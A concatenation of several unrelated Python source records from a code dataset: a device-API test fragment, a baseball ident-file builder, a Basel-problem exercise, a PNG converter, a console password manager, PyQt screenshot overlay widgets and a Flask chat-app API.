query_type='EQUALS')\n assert len(colls) == 1\n\n colls = vm.get_collections(by='NAME', value=config.collection['name'])\n assert len(colls) >= 1\n\n colls = vm.get_collections(by='DESCRIPTION', value=config.collection['description'], query_type='CONTAINS')\n assert len(colls) >= 1\n\n\ndef test_get_pending_devices():\n pends = vm.get_pending_devices(by='DEVICE_ID', value=config.pending['deviceid'], query_type='EQUALS')\n assert len(pends) == 1\n\n pends = vm.get_pending_devices(by='NAME', value=config.pending['name'])\n assert len(pends) == 1\n\n pends = vm.get_pending_devices(by='USER_NAME', value=config.pending['username'], query_type='CONTAINS')\n assert len(pends) >= 1\n\n pends = vm.get_pending_devices(by='CONNECTION_STATE', value=False, query_type='EQUALS')\n assert len(pends) >= 1\n\n pends = vm.get_pending_devices(by='MODEL_NAME', value=config.pending['model'], query_type='EQUALS')\n assert len(pends) >= 1\n\n pends = vm.get_pending_devices(by='VENDOR_NAME', value=config.pending['vendor'], query_type='EQUALS')\n assert len(pends) >= 1\n\n pends = vm.get_pending_devices(by='OS_VERSION', value=config.pending['os'], query_type='EQUALS')\n assert len(pends) >= 1\n\n\ndef test_get_policies():\n pols = vm.get_policies(by='ID', value=config.policy['id'], query_type='EQUALS')\n assert len(pols) == 1\n\n pols = vm.get_policies(by='NAME', value=config.policy['name'], query_type='EQUALS')\n assert len(pols) == 1\n\n\ndef test_get_volumes():\n vols = vm.get_volumes(by='ID', value=config.volume['id'], query_type='EQUALS')\n assert len(vols) == 1\n\n vols = vm.get_volumes(by='NAME', value=config.volume['name'], query_type='EQUALS')\n assert len(vols) == 1\n\n vols = vm.get_volumes(by='PATH', value=config.volume['path'], query_type='EQUALS')\n","sub_path":"tests/test_main_functions.py","file_name":"test_main_functions.py","file_ext":"py","file_size_in_byte":4514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"535442551","text":"\"\"\"Update person ident lists from source records.\n\"\"\"\nimport pathlib\n\nimport pandas as pd\n\n\ndef extract_with_source(path, source, **kwargs):\n \"\"\"Helper function to extract a CSV file and add a 'source' column.\n \"\"\"\n try:\n return pd.read_csv(path, dtype=str, encoding='utf-8', **kwargs) \\\n .assign(source=source)\n except IOError:\n return pd.DataFrame()\n\n\ndef collect_from_palmer(path):\n \"\"\"Collect playing records from Palmer rosters.\n \"\"\"\n print(\"Collecting items from Palmer dataset.\")\n return extract_with_source(path/\"playing_individual.csv\",\n \"palmer\")\n\ndef collect_from_averages(path):\n \"\"\"Collect playing and managing performance records from\n minoraverages repository.\n \"\"\"\n print(\"Collecting items from minoraverages dataset.\")\n return [pd.concat([extract_with_source(sourcepath/\"playing_individual.csv\",\n \"minoraverages/\"+sourcepath.name)\n for sourcepath in (path/\"processed\").glob(\"*\")] +\n [extract_with_source(\n sourcepath/\"managing_individual.csv\",\n \"minoraverages/\" + sourcepath.name\n )\n for sourcepath in (path/\"processed\").glob(\"*\")],\n sort=True, ignore_index=True)]\n\n\ndef collect_from_boxscores(path):\n \"\"\"Collect people entries from boxscores repository.\n \"\"\"\n print(\"Collecting players from boxscores dataset.\")\n players = pd.concat([extract_with_source(sourcepath/\"players.csv\",\n \"/\".join([\"boxscores\",\n sourcepath.parts[-2],\n sourcepath.parts[-1]]))\n for sourcepath in\n (path/\"data\"/\"boxscores\"/\"processed\").glob(\"*/*\")],\n ignore_index=True)\n umpires = pd.concat([extract_with_source(sourcepath/\"umpires.csv\",\n \"/\".join([\"boxscores\",\n sourcepath.parts[-2],\n sourcepath.parts[-1]]))\n for sourcepath in\n (path/\"data\"/\"boxscores\"/\"processed\").glob(\"*/*\")],\n ignore_index=True)\n umpires['entry.name'] = \"#umpire\"\n return [players, umpires]\n\n\ndef collect_retrosheet_rosters(path_retro, year):\n \"\"\"Collect the roster files from the Retrosheet repository for 'year'.\n \"\"\"\n return pd.concat([pd.read_csv(fn, dtype=str, encoding='utf-8',\n header=None,\n names=['person.ref',\n 'person.name.last',\n 'person.name.given',\n 'bats', 'throws', 'team.key', 'pos'],\n usecols=['person.ref', 'team.key',\n 'person.name.last',\n 'person.name.given'])\n for fn in (path_retro/\"rosters\").glob(\"*%s.ROS\" % year)],\n sort=False, ignore_index=True)\n\n\ndef collect_from_retrosheet(path_splits, path_retro):\n \"\"\"Collect playing entries from retrosplits repository.\n \"\"\"\n print(\"Collecting items from Retrosheet dataset.\")\n dflist = []\n teams = pd.read_csv(\"support/retroteams.csv\", dtype=str, encoding='utf-8')\n for year in range(1906, 1920):\n df = pd.read_csv(path_splits/\"daybyday\"/(\"playing-%d.csv\" % year),\n dtype=str, encoding='utf-8',\n usecols=['person.key', 'team.key', 'game.date']) \\\n .groupby(['person.key', 'team.key'])['game.date'] \\\n .agg(['min', 'max']) \\\n .set_axis(['S_FIRST', 'S_LAST'],\n axis='columns', inplace=False) \\\n .reset_index()\n df['league.year'] = df['S_FIRST'].str.split('-').str[0]\n df = df.merge(teams, how='left', on=['league.year', 'team.key']) \\\n .rename(columns={'person.key': 'person.ref'}) \\\n .assign(source=\"retrosheet/%s\" % year) \\\n .merge(collect_retrosheet_rosters(path_retro, year),\n how='left', on=['person.ref', 'team.key'])\n dflist.append(df[['source', 'league.year', 'league.name',\n 'person.ref',\n 'person.name.last', 'person.name.given',\n 'entry.name', 'S_FIRST', 'S_LAST']])\n return dflist\n\n\ndef extract_idents(path):\n \"\"\"Compile the existing ident files. 'path' is the root of the repository\n of person ident files.\n \"\"\"\n print(\"Collecting identfiles\")\n idents = pd.concat([pd.read_csv(fn, dtype=str, encoding='utf-8')\n for fn in path.glob(\"*/*.csv\")],\n ignore_index=True, sort=False)\n for col in ['person.name.given', 'S_STINT']:\n idents[col] = idents[col].fillna(\"\")\n return idents[['ident', 'source', 'league.year', 'league.name',\n 'person.ref', 'person.name.last', 'person.name.given',\n 'S_STINT', 'entry.name']]\n\n\ndef extract_sources():\n \"\"\"Collect up person references from the various sources.\n \"\"\"\n retrolist = collect_from_retrosheet(\n path_splits=pathlib.Path(\"../retrosplits\"),\n path_retro=pathlib.Path(\"../retrosheet\")\n )\n palmer = [\n collect_from_palmer(pathlib.Path(\"../palmer/minors/data/processed\"))\n ]\n avglist = collect_from_averages(pathlib.Path(\"../minoraverages\"))\n boxlist = collect_from_boxscores(pathlib.Path(\"../boxscores\"))\n print(\"Concatenating files...\")\n return pd.concat(retrolist + palmer + avglist + boxlist,\n sort=False, ignore_index=True)\n\n\ndef clean_sources(df):\n \"\"\"Clean up source records into a standard format.\n \"\"\"\n # Fill in an indicator for records which indicate a position played\n # but not games at that position\n df[\"pos\"] = \"\"\n for pos in [\"P\", \"C\", \"1B\", \"2B\", \"3B\", \"SS\", \"OF\", \"LF\", \"CF\", \"RF\"]:\n if f\"F_{pos}_G\" in df and f\"F_{pos}_POS\" in df:\n df[f\"F_{pos}_G\"] = (\n df[f\"F_{pos}_G\"].fillna(\n df[f\"F_{pos}_POS\"].apply(\n lambda x:\n \"\" if not pd.isnull(x) and int(x) > 0\n else None\n )\n )\n )\n df[\"pos\"] += df[f\"F_{pos}_G\"].apply(lambda x:\n pos.lower() + str(x) + \",\"\n if not pd.isnull(x) and x != \"0\"\n else \"\")\n df[\"pos\"] = df[\"pos\"].str.rstrip(\",\")\n for col in ['person.name.given', 'S_STINT']:\n df[col] = df[col].fillna(\"\")\n # We convert dates to YYYYMMDD. This way, ident files can be loaded\n # into e.g. Excel for editing, without messing up the formatting.\n # YYYYMMDD is considered a valid ISO date format as well.\n for col in ['S_FIRST', 'S_LAST']:\n df[col] = df[col].str.replace(\"-\", \"\")\n return df\n\n\ndef merge_idents(df, idents):\n \"\"\"Apply existing person reference identifications to dataset of sources.\n \"\"\"\n if not idents.empty:\n df = df.merge(idents, how='left',\n on=['source', 'league.year', 'league.name',\n 'person.ref',\n 'person.name.last', 'person.name.given',\n 'S_STINT', 'entry.name'])\n else:\n df['ident'] = None\n return (\n df[['source', 'league.year', 'league.name', 'ident', 'person.ref',\n 'person.name.last', 'person.name.given',\n 'S_STINT', 'entry.name',\n 'S_FIRST', 'S_LAST', 'B_G', 'P_G', 'pos']]\n .drop_duplicates()\n .sort_values(['league.year', 'league.name',\n 'person.name.last', 'source', 'person.ref'])\n )\n\n\ndef load_idents(df, path):\n \"\"\"Write out ident files to disk repository.\n \"\"\"\n print(\"Writing ident files...\")\n for ((year, league), data) in df.groupby(['league.year', 'league.name']):\n # We only generate ident files for leagues where we have\n # either an averages compilation or boxscore data\n sample = data[data['source'].str.startswith('retrosheet/') |\n data['source'].str.startswith('minoraverages/') |\n data['source'].str.startswith('boxscores/')]\n if sample.empty:\n continue\n print(year, league)\n (path / year).mkdir(exist_ok=True)\n filepath = (path / year /\n (\"%s%s.csv\" %\n (year, league.replace(\" \", \"\").replace(\"-\", \"\"))))\n data.to_csv(filepath, index=False, encoding='utf-8')\n\n\ndef main():\n \"\"\"Update person ident lists from source records.\n \"\"\"\n ident_path = pathlib.Path(\"data/ident/people\")\n idents = extract_idents(ident_path)\n extract_sources().pipe(clean_sources) \\\n .pipe(merge_idents, idents) \\\n .pipe(load_idents, ident_path)\n","sub_path":"hgame/ident/people.py","file_name":"people.py","file_ext":"py","file_size_in_byte":9354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"112563789","text":"# 1. 请写出求巴塞尔问题近似解的python代码\r\n# (注:巴塞尔问题不了解是什么可以百度,但是请不要试图抄网上的答案)\r\n\r\nimport math\r\n\r\ndef TheBaselProblem(N):\r\n BP_num = 0\r\n for i in range(1,N+1):\r\n BP_num+=1/(i*i)\r\n return BP_num\r\n\r\nif __name__ == '__main__':\r\n N = int(1e6)\r\n BP_value = TheBaselProblem(N)\r\n print(\r\n \"巴塞尔问题近似解:%s\\n近似解与实值误差:%s\"\r\n %(BP_value,math.pi*math.pi/6-BP_value)\r\n )\r\n\r\n\r\n# 2. sqrt(1+2*sqrt(1+3*sqrt(1+4*sqrt(1+...))))的值等于? \r\n# (提示:第二题可以使用python,也可以手算,给出结果即可)\r\n# 答案为:3","sub_path":"Ag/MyCode/tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"184017239","text":"from sqlalchemy_declarative import User, Base\nfrom sqlalchemy import create_engine\nengine = create_engine('sqlite:///proxy.db', echo=True)\nBase.metadata.bind = engine\nfrom sqlalchemy.orm import sessionmaker\nDBSession = sessionmaker()\nDBSession.bind = engine\nsession = DBSession()\n# Make a query to find all Persons in the database\nsession.query(User).all()\n# Return the first Person from all Persons in the database\nperson = session.query(User).first()\nperson.username\n# Find all Address whose person field is pointing to the person object\n#session.query(Address).filter(Address.person == person).all()\n# Retrieve one Address whose person field is point to the person object\n#session.query(Address).filter(Address.person == person).one()\n#address = session.query(Address).filter(Address.person == person).one()\n#address.post_code\n","sub_path":"__src__/working/db_model/sql_test.py","file_name":"sql_test.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"217698167","text":"from PIL import Image\nimport os\n\ndef IsValidImage(img_path):\n \"\"\"\n 判断文件是否为有效(完整)的图片\n :param img_path:图片路径\n :return:True:有效 False:无效\n \"\"\"\n bValid = True\n try:\n Image.open(img_path).verify()\n except:\n bValid = False\n return bValid\n\n\ndef transimg(img_path):\n \"\"\"\n 转换图片格式\n :param img_path:图片路径\n :return: True:成��� False:失败\n \"\"\"\n if IsValidImage(img_path):\n try:\n str = img_path.rsplit(\".\", 1)\n output_img_path = str[0] + \".jpg\"\n print(output_img_path)\n im = Image.open(img_path)\n im.convert('RGB').save(output_img_path)\n return True\n except:\n return False\n else:\n return False\n\n\nif __name__ == '__main__':\n for maindir, subdir, file_name_list in os.walk(\"./\"):\n for filename in file_name_list:\n ext = os.path.splitext(filename)[1]\n if ext == \".png\":\n print(transimg(filename))\n","sub_path":"screenshoot/png2jpg.py","file_name":"png2jpg.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"549553090","text":"from decrypt import *\nfrom encrypt import *\nfrom saves import *\nfrom pprint import pprint as pprint\n\nraw_data = read_file('data.txt')\n\nprint('\\n\\n--------------------------------------------------------------------------------')\nprint('Password Manager')\nprint('--------------------------------------------------------------------------------\\n')\nwhile True:\n ENCRYPTION_KEY = input('Enter ENCYRYPTION_KEY: ')\n if ENCRYPTION_KEY.isdigit():\n ENCRYPTION_KEY = int(ENCRYPTION_KEY)\n break\n else:\n print('ENCRYPTION_KEY has to convertible to integer. Returning HOME.')\n continue\n\n\nprint('Decyrpting with key...\\n\\n')\ndata = decrypt(raw_data, ENCRYPTION_KEY)\n\nwhile True:\n print('Press \\'1\\' \\t\\t\\t+ \\'ENTER\\' to GET DATA')\n print('Press \\'2\\' \\t\\t\\t+ \\'ENTER\\' to SET DATA')\n print('Press any other button \\t\\t+ \\'ENTER\\' to EXIT')\n user_input = input('>> ')\n\n print('\\nAllowed characters:')\n print('Digits, Letters (big/small, including ÄÖÜ), Special Characters (@.:/- [SPACE])\\n')\n\n # Getting Data\n if user_input == '1':\n\n print('\\DATA_KEYs\\n--------------------------------------------------------------------------------')\n for key in data.keys():\n print(key)\n DATA_KEY = input('\\nDATA_KEY for DESIRED ENTRY: ')\n\n if DATA_KEY in data.keys():\n pprint(data[DATA_KEY])\n user_input = input('Press ENTER to return HOME')\n\n else:\n print('INVALID DATA_KEY. Returning HOME.')\n\n # Setting Data\n elif user_input == '2':\n print('\\nPress \\'1\\' \\t\\t\\t+ \\'ENTER\\' to CREATE NEW ENTRY')\n print('Press \\'2\\' \\t\\t\\t+ \\'ENTER\\' to CHANGE EXISTING')\n user_input = input('>> ')\n\n # Creating New Entry\n if user_input == '1':\n DATA_KEY = input('\\nDATA_KEY for NEW ENTRY: ')\n if DATA_KEY in data.keys():\n print('DATA_KEY ALREADY EXISTING.\\n')\n print()\n else:\n data[DATA_KEY] = {}\n while True:\n ENTRY_KEY = input('ENTRY_KEY: ')\n if ENTRY_KEY in data[DATA_KEY].keys():\n print('ENTRY_KEY ALREADY EXISTING.')\n print('Press \\'1\\' \\t\\t\\t+ \\'ENTER\\' to TRY AGAIN')\n print('Press any other button \\t\\t+ \\'ENTER\\' to RETURN HOME')\n user_input = input('>> ')\n if user_input == 1:\n continue\n else:\n break\n else:\n ENTRY_VALUE = input('ENTRY_VALUE: ')\n data[DATA_KEY][ENTRY_KEY] = ENTRY_VALUE\n print('Created \\'' + ENTRY_VALUE + '\\' as \\'' + ENTRY_KEY + '\\' in ' + DATA_KEY)\n print('\\nPress \\'1\\' \\t\\t\\t+ \\'ENTER\\' to CREATE MORE ENTRIES')\n print('Press any other button \\t\\t+ \\'ENTER\\' to RETURN HOME')\n user_input = input('>> ')\n if user_input == '1':\n pass\n else:\n break\n\n # Changing Entry\n elif user_input == '2':\n DATA_KEY = input('\\nDATA_KEY for DESIRED ENTRY: ')\n if DATA_KEY not in data.keys():\n print('INVALID DATA_KEY. Returning HOME.')\n else:\n while True:\n pprint(data[DATA_KEY])\n ENTRY_KEY = input('ENTRY_KEY for DESIRED ENTRY: ')\n if ENTRY_KEY not in data[DATA_KEY].keys():\n print('INVALID ENTRY_KEY. Returning HOME.') # + add ENTRY_KEY\n else:\n ENTRY = input('New ENTRY: ')\n data[DATA_KEY][ENTRY_KEY] = ENTRY\n print('Changed ENTRY to ' + data[DATA_KEY][ENTRY_KEY])\n print('Press \\'1\\' \\t\\t\\t+ \\'ENTER\\' to CHANGE MORE ENTRIES')\n print('Press any other button \\t+ \\'ENTER\\' to RETURN HOME')\n user_input = input('>> ')\n if user_input == 1:\n pass\n else:\n break\n\n else:\n print('INVALID INPUT. Returning HOME.')\n\n else:\n print('')\n if ENCRYPTION_KEY is not '':\n write_file(encrypt(data, ENCRYPTION_KEY))\n print('\\n\\n')\n break\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"438626383","text":"#!/usr/bin/python3\nimport sys\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtCore import QSize, Qt\nfrom processing import SHOTNAME, SHOTPATH\n\nclass BaseLayer(QtWidgets.QWidget):\n def __init__(self):\n super().__init__()\n __screen = QtWidgets.QDesktopWidget().screenGeometry(-1)\n self.height, self.width = __screen.height(), __screen.width()\n self.setGeometry(0,0,self.width,self.height)\n self.rectx, self.recty, self.rectw, self.recth = [0 for i in range(4)]\n self.setCursor(QtGui.QCursor(QtGui.QCursor(QtCore.Qt.CrossCursor)))\n self.setWindowFlags(QtCore.Qt.WindowStaysOnTopHint | QtCore.Qt.FramelessWindowHint | QtCore.Qt.X11BypassWindowManagerHint)\n self.begin = QtCore.QPoint()\n self.end = QtCore.QPoint()\n\nclass LoopZoop(BaseLayer): \n def __init__(self):\n super().__init__()\n self.zoom = 4\n self.initUI()\n self.setGeometry((self.width - 165), 15, 120, 120)\n self.view.setFrameShape(QtWidgets.QFrame.NoFrame)\n\n def initUI(self): \n self.img = QtGui.QPixmap(SHOTPATH[0])\n self.scene = QtWidgets.QGraphicsScene()\n self.scene.addPixmap(self.img)\n self.view = QtWidgets.QGraphicsView(self.scene, self)\n self.view.scale(self.zoom, self.zoom)\n\nclass Crosshair(LoopZoop):\n def __init__(self):\n super().__init__()\n self.setAttribute(Qt.WA_TranslucentBackground, True)\n self.zoom = 1\n self.initUI()\n self.setWindowOpacity(0.15)\n\n def initUI(self):\n self.img = QtGui.QPixmap(\"{}/src/crosshair.png\".format(sys.path[0]))\n self.scene = QtWidgets.QGraphicsScene()\n self.scene.addPixmap(self.img)\n self.view = QtWidgets.QGraphicsView(self.scene, self)\n self.view.scale(self.zoom, self.zoom)\n\nclass LePalette(BaseLayer): \n def __init__(self):\n super().__init__()\n self.setGeometry((self.width / 2 - 120), (self.height - 46), 240, 20)\n self.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.setAttribute(Qt.WA_TranslucentBackground, True)\n self.pen = \"#e81832\"\n self.brush = 0\n self.initUI()\n\n def initUI(self):\n red, blue, green, yellow, black, white = [QtWidgets.QPushButton(\"\", self) for i in range(0, 6)]\n self.fill = QtWidgets.QCheckBox(\"\", self)\n red.setGeometry(0, 0, 20, 20)\n red.setStyleSheet(\"background-color: #e81832; border: 2px solid black; border-radius: 8px;\")\n red.clicked.connect(self.redded)\n blue.setGeometry(20, 0, 20, 20)\n blue.setStyleSheet(\"background-color: #2459c8; border: 2px solid black; border-radius: 8px;\")\n blue.clicked.connect(self.blued)\n green.setGeometry(40, 0, 20, 20)\n green.setStyleSheet(\"background-color: #23c84f; border: 2px solid black; border-radius: 8px;\")\n green.clicked.connect(self.greened)\n yellow.setGeometry(60, 0, 20, 20)\n yellow.setStyleSheet(\"background-color: #c8ac23; border: 2px solid black; border-radius: 8px;\")\n yellow.clicked.connect(self.yellowed)\n black.setGeometry(80, 0, 20, 20)\n black.setStyleSheet(\"background-color: black; border: 2px solid white; border-radius: 8px;\")\n black.clicked.connect(self.blacked)\n white.setGeometry(100, 0, 20, 20)\n white.setStyleSheet(\"background-color: white; border: 2px solid black; border-radius: 8px;\")\n white.clicked.connect(self.whited)\n self.info = QtWidgets.QLabel(self)\n self.info.setText('Fill:')\n self.info.move(150, 1)\n self.info.setStyleSheet(\"background-color: white; border: 2px solid black; border-radius: 4px;\")\n self.fill.setGeometry(190, 0, 20, 20)\n\n @QtCore.pyqtSlot()\n def redded(self):\n self.pen = \"#e81832\"\n def blued(self):\n self.pen = \"#2459c8\"\n def greened(self):\n self.pen = \"#23c84f\"\n def yellowed(self):\n self.pen = \"#c8ac23\"\n def blacked(self):\n self.pen = \"black\"\n def whited(self):\n self.pen = \"white\"\n\nclass Toolkit(BaseLayer):\n def __init__(self):\n super().__init__()\n self.setAttribute(Qt.WA_TranslucentBackground, True)\n self.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.setGeometry((self.width / 2 - 120), (self.height - 25), 240, 25)\n self.setWindowOpacity(0.85)\n self.switch = 0\n self.thickness = 4\n self.isopened = 0\n self.initUI()\n\n def update_label(self):\n self.drawThickness.setText(\"Thickness: {}\".format(self.thickness))\n self.drawThickness.update()\n\n def initUI(self):\n select, blur, circle, rectangle, line = [QtWidgets.QPushButton(\"\", self) for i in range(0, 5)]\n self.drawThickness = QtWidgets.QLabel(self)\n self.drawThickness.setText(\"Thickness: {}\".format(self.thickness))\n self.drawThickness.setFixedWidth(92)\n self.drawThickness.move(150, 4)\n self.drawThickness.setStyleSheet(\"background-color: white; border: 2px solid black; border-radius: 4px;\")\n\n select.clicked.connect(self.selected)\n select.setGeometry(0, 0, 24, 24)\n select.setIcon(QtGui.QIcon(\"{}/src/selection.png\".format(sys.path[0])))\n select.setIconSize(QtCore.QSize(18, 18))\n select.setStyleSheet(\"QPushButton { background-color: white; border: 2px solid black; border-radius: 4px; }\\\n QPushButton:pressed { background-color: #acacac; }\")\n blur.setIcon(QtGui.QIcon(\"{}/src/blur.png\".format(sys.path[0])))\n blur.setIconSize(QtCore.QSize(18, 18))\n blur.clicked.connect(self.blurred)\n blur.setGeometry(25, 0, 24, 24)\n blur.setStyleSheet(\"QPushButton { background-color: white; border: 2px solid black; border-radius: 4px; }\\\n QPushButton:pressed { background-color: #acacac; }\")\n circle.setIcon(QtGui.QIcon(\"{}/src/circle.png\".format(sys.path[0])))\n circle.setIconSize(QtCore.QSize(18, 18))\n circle.clicked.connect(self.circled)\n circle.setGeometry(50, 0, 24, 24)\n circle.setStyleSheet(\"QPushButton { background-color: white; border: 2px solid black; border-radius: 4px; }\\\n QPushButton:pressed { background-color: #acacac; }\")\n rectangle.setIcon(QtGui.QIcon(\"{}/src/rectangle.png\".format(sys.path[0])))\n rectangle.setIconSize(QtCore.QSize(18, 18))\n rectangle.clicked.connect(self.rectangled)\n rectangle.setGeometry(75, 0, 24, 24)\n rectangle.setStyleSheet(\"QPushButton { background-color: white; border: 2px solid black; border-radius: 4px; }\\\n QPushButton:pressed { background-color: #acacac; }\")\n line.setIcon(QtGui.QIcon(\"{}/src/line.png\".format(sys.path[0])))\n line.setIconSize(QtCore.QSize(18, 18))\n line.clicked.connect(self.lined)\n line.setGeometry(100, 0, 24, 24)\n line.setStyleSheet(\"QPushButton { background-color: white; border: 2px solid black; border-radius: 4px; }\\\n QPushButton:pressed { background-color: #acacac; }\")\n\n @QtCore.pyqtSlot()\n def lined(self):\n self.switch = 4\n def rectangled(self):\n self.switch = 3\n def circled(self):\n self.switch = 2\n def blurred(self):\n self.switch = 1\n def selected(self):\n self.switch = 0\n","sub_path":"overlay.py","file_name":"overlay.py","file_ext":"py","file_size_in_byte":7409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"118489082","text":"from flask import Flask, jsonify, request, session, flash\nfrom flask_cors import CORS, cross_origin\nfrom functools import wraps\nfrom handler import Chat\nfrom handler import Post\nfrom handler import User\nfrom dao.PostDAO import PostDAO\nfrom dao.UserDAO import UserDAO\nimport os\n\npostDao = PostDAO()\nuserDao = UserDAO()\n\napp = Flask(__name__)\nCORS(app, supports_credentials=True)\n\napp.config['DEBUG'] = True\napp.config['SECRET_KEY'] = 'pictochat'\napp.config['UPLOAD_FOLDER'] = '/static'\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])\n\n# Check if user is logged in\ndef is_logged_in(f):\n @wraps(f)\n def wrap(*args, **kwargs):\n if 'logged_in' in session:\n return f(*args, **kwargs)\n else:\n flash('Unauthorized, please log in.', 'danger')\n return jsonify(Error=\"Unauthorized, please log in.\"), 404\n\n return wrap\n\n# Check file extension\ndef allowed_file(filename):\n return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n@app.route('/Pictochat') # OK\ndef homeforApp():\n return \"Welcome to Pictochat\"\n\n\n###################### Users Routes ############################\n\n@app.route('/Pictochat/users/register', methods=['GET', 'POST'])\ndef register():\n if request.method == 'POST':\n return User.register(request.json)\n return jsonify(Error=\"Method not allowed.\"), 405\n\n\n# Login\n@app.route('/Pictochat/users/login', methods=['GET', 'POST'])\ndef login():\n if request.method == 'POST':\n result = User.login(request.json)\n return result\n return jsonify(Error=\"Method not allowed.\"), 405\n\n\n# Logout\n@app.route('/Pictochat/users/logout')\n@cross_origin(supports_credentials=True)\n@is_logged_in\ndef logout():\n session.clear()\n flash(\"You are now logged out.\", \"success\")\n return jsonify(LoggedOut='Logged out')\n\n\n# TODO: need query return all users in the system except current_user (logged), and users on his contactList.\n@app.route('/Pictochat/users/all', methods=['GET'])\ndef getAllUsers():\n if request.method == 'GET':\n result = User.getAllUsers()\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/users/logged', methods=['GET'])\ndef getAllUsersNotSession():\n if request.method == 'GET':\n result = User.getAllUsersNotSession()\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/users/', methods=['GET'])\ndef getUserByID(user_id):\n if request.method == 'GET':\n result = User.getUserInfo(user_id)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/users/username/', methods=['GET'])\ndef getUserByUsername(username):\n if request.method == 'GET':\n result = User.getUserByUsername(username)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/post//likes', methods=['GET'])\ndef getUsersWhoLikedPost(post_id):\n if request.method == 'GET':\n result = User.getUsersWhoLikedPost(post_id)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/post//dislikes', methods=['GET'])\ndef getUsersWhoDislikedPost(post_id):\n if request.method == 'GET':\n result = User.getUsersWhoDislikedPost(post_id)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/chat//users', methods=['GET'])\ndef getUsersByChatID(chat_id):\n if request.method == 'GET':\n result = User.getUsersByChatID(chat_id)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/chat//admin', methods=['GET'])\ndef getAdminByChatID(chat_id):\n if request.method == 'GET':\n result = User.getAdminByChatID(chat_id)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n###################### Credential Routes ######################\n\n@app.route('/Pictochat/credentials/all', methods=['GET'])\ndef getCredentials():\n if request.method == 'GET':\n result = User.getAllCredentials()\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/credentials/user/', methods=['GET'])\ndef getUserCredentialByID(user_id):\n if request.method == 'GET':\n result = User.getUserCredentials(user_id)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n###################### Activity Routes ########################\n\n@app.route('/Pictochat/activity/all', methods=['GET'])\ndef getAllActivities():\n if request.method == 'GET':\n result = User.getAllActivity()\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/activity/user/', methods=['GET'])\ndef getUserActivityByID(user_id):\n if request.method == 'GET':\n result = User.getUserActivity(user_id)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n###################### Contacts Routes ######################\n\n@app.route('/Pictochat/user//contacts', methods=['GET', 'POST'])\ndef getUserContactsByID(user_id):\n if request.method == 'GET':\n result = User.getUserContactsByID(user_id)\n return result\n elif request.method == 'POST':\n result = User.addContacts(request.json)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n###################### Chat Routes ############################\n\n@app.route('/Pictochat/chats/new', methods=['GET', 'POST'])\n@cross_origin(supports_credentials=True)\n@is_logged_in\ndef createChat():\n if request.method == 'POST':\n User.registerActivity()\n return Chat.createChat(request.json)\n return jsonify(Error=\"Method not allowed.\"), 405\n\n\n@app.route('/Pictochat/chats/all', methods=['GET', 'POST'])\ndef getAllChats():\n if request.method == 'GET':\n result = Chat.getAllChats()\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/chat/', methods=['GET'])\ndef getChatByID(chat_id):\n if request.method == 'GET':\n result = Chat.getChatByID(chat_id)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/chats/', methods=['GET'])\ndef getChatByUserID(user_id):\n if request.method == 'GET':\n result = Chat.getChatByUserID(user_id)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/chat//posts', methods=['GET', 'POST'])\ndef getPostsByChatID(chat_id):\n if request.method == 'GET':\n result = Post.getPostsByChatIDForUI(chat_id)\n return result\n elif request.method == 'POST':\n result = Post.insertMessage(request.json)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n###################### Post Routes ########################\n\n@app.route('/Pictochat/post/new', methods=['GET', 'POST'])\n@cross_origin(supports_credentials=True)\n@is_logged_in\ndef createPost():\n if request.method == 'POST':\n if allowed_file(request.files['file'].filename):\n User.registerActivity()\n return Post.createPost(request.form, request.files['file'], app.config['UPLOAD_FOLDER'])\n return jsonify(Error=\"File extension not allowed\"), 405\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/posts/all', methods=['GET'])\ndef getAllPosts():\n if request.method == 'GET':\n result = Post.getAllPost()\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n###################### Hashtag Routes ######################\n\n\n###################### Reaction Routes 